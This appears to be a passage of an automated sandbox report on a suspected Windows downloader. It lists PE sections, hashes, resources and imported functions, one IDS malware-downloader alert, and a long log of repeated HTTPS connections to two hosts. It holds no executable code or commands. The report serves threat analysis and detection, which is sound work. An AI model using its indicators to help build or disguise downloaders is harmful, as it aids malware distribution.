IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ed2	0x6000	9112619c91f32f6f8e4096e108712ebe	False	0.6629638671875	data	6.442176588686321	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1248	0x1400	1c9a524313c13059919ecf8195d205be	False	0.4275390625	data	5.007650149182371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	458aeaedc3eabb1f26ec1bbd666017ae	False	0.6396484375	data	5.13585559284969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0xf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33000	0x15788	0x15800	40497017b2a1d5e01ad2b917ac12d1eb	False	0.2589821039244186	data	4.486367209516884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x332c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.21990713356204897
RT_ICON	0x43af0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.35072614107883815
RT_ICON	0x46098	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.39094746716697937
RT_ICON	0x47140	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.48811475409836064
RT_ICON	0x47ac8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5523049645390071
RT_DIALOG	0x47f30	0x100	data	English	United States	0.5234375
RT_DIALOG	0x48030	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x48150	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x48218	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x48278	0x4c	data	English	United States	0.8157894736842105
RT_VERSION	0x482c8	0x180	data	English	United States	0.5859375
RT_MANIFEST	0x48448	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T16:43:50.010223+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49709	172.217.19.174	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 16:43:47.279522896 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:47.279575109 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:47.279665947 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:47.292957067 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:47.292999029 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:49.088512897 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:49.088618040 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:49.089355946 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:49.089418888 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:49.179348946 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:49.179380894 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:49.179785013 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:49.179833889 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:49.183219910 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:49.223330021 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:50.010217905 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:50.010442019 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:50.010467052 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:50.010591984 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:50.011008024 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:50.011030912 CET	443	49709	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:50.011117935 CET	49709	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:50.267216921 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:50.267265081 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:50.267369032 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:50.267718077 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:50.267730951 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:51.972306013 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:51.972426891 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:51.976845980 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:51.976888895 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:51.977178097 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:51.977279902 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:51.977626085 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.023344040 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:52.926780939 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:52.926940918 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.926964998 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:52.927038908 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.927529097 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:52.927596092 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.927783966 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:52.927833080 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.927843094 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:52.927886963 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.942373991 CET	49710	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:52.942398071 CET	443	49710	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:53.062191963 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:53.062244892 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:53.062413931 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:53.062766075 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:53.062777996 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:54.950972080 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:54.951081038 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:54.951767921 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:54.951838970 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:54.954103947 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:54.954122066 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:54.954376936 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:54.954428911 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:54.954955101 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:54.999336004 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:55.880552053 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:55.880697012 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:55.880711079 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:55.880754948 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:55.880903959 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:55.880950928 CET	443	49711	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:55.881057024 CET	49711	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:55.891484022 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:55.891542912 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:55.891630888 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:55.891940117 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:55.891951084 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:57.639349937 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:57.639460087 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:57.640193939 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:57.640203953 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:57.640398979 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:57.640403986 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:58.597474098 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:58.597609997 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:58.597637892 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:58.597816944 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:58.598123074 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:58.598190069 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:58.598190069 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:58.598258018 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:58.599096060 CET	49712	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:43:58.599117994 CET	443	49712	142.250.181.1	192.168.2.9
Dec 3, 2024 16:43:58.749149084 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:58.749196053 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:43:58.749269962 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:58.760560036 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:43:58.760596037 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:00.516244888 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:00.516472101 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:00.516994953 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:00.517060041 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:00.519001007 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:00.519013882 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:00.519256115 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:00.519306898 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:00.519738913 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:00.567338943 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:01.426670074 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:01.426794052 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:01.426815987 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:01.426892042 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:01.427006960 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:01.427082062 CET	443	49714	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:01.427164078 CET	49714	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:01.437412977 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:01.437464952 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:01.437573910 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:01.437891960 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:01.437906027 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:03.234215021 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:03.234369040 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:03.257872105 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:03.257882118 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:03.258059025 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:03.258064985 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:04.214066029 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:04.214364052 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:04.214812994 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:04.214879990 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:04.215167046 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:04.215209961 CET	443	49715	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:04.215270996 CET	49715	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:04.343247890 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:04.343305111 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:04.343400955 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:04.343759060 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:04.343774080 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.038901091 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.039170980 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.039722919 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.039779902 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.050128937 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.050148010 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.050430059 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.050498962 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.050839901 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.095335960 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.949820995 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.949906111 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.949924946 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.950263023 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.951102018 CET	49716	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:06.951117992 CET	443	49716	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:06.969445944 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:06.969497919 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:06.969572067 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:06.969825029 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:06.969836950 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:08.709683895 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:08.709764004 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:08.742424965 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:08.742443085 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:08.742755890 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:08.742805958 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:08.750181913 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:08.791321993 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:09.692127943 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:09.692229033 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:09.692574024 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:09.692625999 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:09.693082094 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:09.693119049 CET	443	49717	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:09.693175077 CET	49717	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:09.811568022 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:09.811624050 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:09.811698914 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:09.811942101 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:09.811954021 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:11.553297997 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:11.553404093 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:11.553858995 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:11.553875923 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:11.554075956 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:11.554083109 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:12.469752073 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:12.469875097 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:12.469892979 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:12.469939947 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:12.469984055 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:12.470062017 CET	443	49718	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:12.470122099 CET	49718	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:12.477447033 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:12.477497101 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:12.477577925 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:12.477782965 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:12.477799892 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:14.273379087 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:14.273595095 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:14.275922060 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:14.275933027 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:14.276973009 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:14.277041912 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:14.277436018 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:14.323323965 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:15.249146938 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:15.249291897 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:15.249852896 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:15.249907970 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:15.249953985 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:15.250020981 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:15.250082016 CET	443	49719	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:15.250108004 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:15.250145912 CET	49719	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:15.373684883 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:15.373744965 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:15.373846054 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:15.374078989 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:15.374089956 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.072827101 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.073050022 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.073612928 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.073667049 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.076267004 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.076281071 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.076546907 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.078547955 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.078831911 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.123330116 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.986525059 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.986736059 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.986766100 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.986828089 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.986871958 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:17.986907959 CET	443	49720	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:17.986968040 CET	49720	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:18.004483938 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:18.004520893 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:18.004595995 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:18.004983902 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:18.004993916 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:19.742727995 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:19.742794037 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:19.744600058 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:19.744612932 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:19.744862080 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:19.744930983 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:19.745258093 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:19.791342974 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:20.721093893 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:20.721230030 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:20.721265078 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:20.721405983 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:20.721787930 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:20.721851110 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:20.722237110 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:20.722282887 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:20.722438097 CET	443	49721	142.250.181.1	192.168.2.9
Dec 3, 2024 16:44:20.722507954 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:20.722527027 CET	49721	443	192.168.2.9	142.250.181.1
Dec 3, 2024 16:44:20.846344948 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:20.846400976 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:20.846457005 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:20.846999884 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:20.847011089 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:22.592969894 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:22.593075991 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:22.593729019 CET	443	49723	172.217.19.174	192.168.2.9
Dec 3, 2024 16:44:22.593794107 CET	49723	443	192.168.2.9	172.217.19.174
Dec 3, 2024 16:44:22.598058939 CET	49723	443	192.168.2.9	172.217.19.174
